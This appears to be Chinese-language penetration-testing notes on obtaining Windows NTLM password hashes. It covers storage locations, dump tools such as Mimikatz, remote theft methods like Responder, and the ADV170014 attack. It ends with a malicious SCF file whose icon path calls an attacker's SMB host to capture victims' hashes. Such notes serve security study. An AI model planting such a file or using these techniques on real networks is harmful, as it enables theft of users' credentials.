目录

获取 NTLM

获取 NTLM

1 相关背景

1.1 NTLM 的存储位置:

1、系统数据库 SAM (Security Account Manager)

2、DIT 数据库

3、内存 Cache

1.2 NTLM 的获取方式

1、从 SAM 获取

2、内存获取

3、DIT 数据库获取

4、WCE、PWDUMP、MIMIKATZ…

1.3 NTLM 的形式

aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42

LMHash (windows 2008 R2系统以后系统默认不保存 LMHash)

NTHash

NetHash - 主要获取该种 hash

1.4 远程获取方式(窃取):

1、Responder

2、HTTP + SMB

3、SCF + SMB

4、SQL + SMB

ADV 170014 NTLM SSO

2017 年 10 月,微软在周二补丁日公布了一份安全公告(ADV170014),这份安全公告中提到了 NTLM 身份验证方案中的一个漏洞,恶意攻击者可以利用这个漏洞来窃取哈希。

攻击者只需要将一个恶意的 SCF 文件放置在可公开访问的 Windows 文件夹中即可。

一旦文件被放在文件夹中,就会被一个神秘的 bug 执行。它会收集目标的 NTLM 密码散列,并将其发送到一个配置服务器中。

目标主机存在没有设置密码保护的一个共享文件夹,这种场景非常常见,比如办公室、学校、医院以及大多数 Windows 环境中,人们都会通过共享文件夹来共享音乐、照片以及文档。

攻击场景

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200509105732.png-water_print

非正版系统可能没有该设置:

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200509105840.png-water_print

微软在 Windows 3.11 时引入了 SCF 文件。SCF文件其实是纯文本文件,可以用来指导 Windows 文件资源管理器执行一些基本任务。

1
2
3
4
5
[Shell]
Command=2 
IconFile=\\192.168.1.2\sharetest.ico 
[Taskbar] 
Command=ToggleDesktop

https://geekby.oss-cn-beijing.aliyuncs.com/MarkDown/20200509110136.png-water_print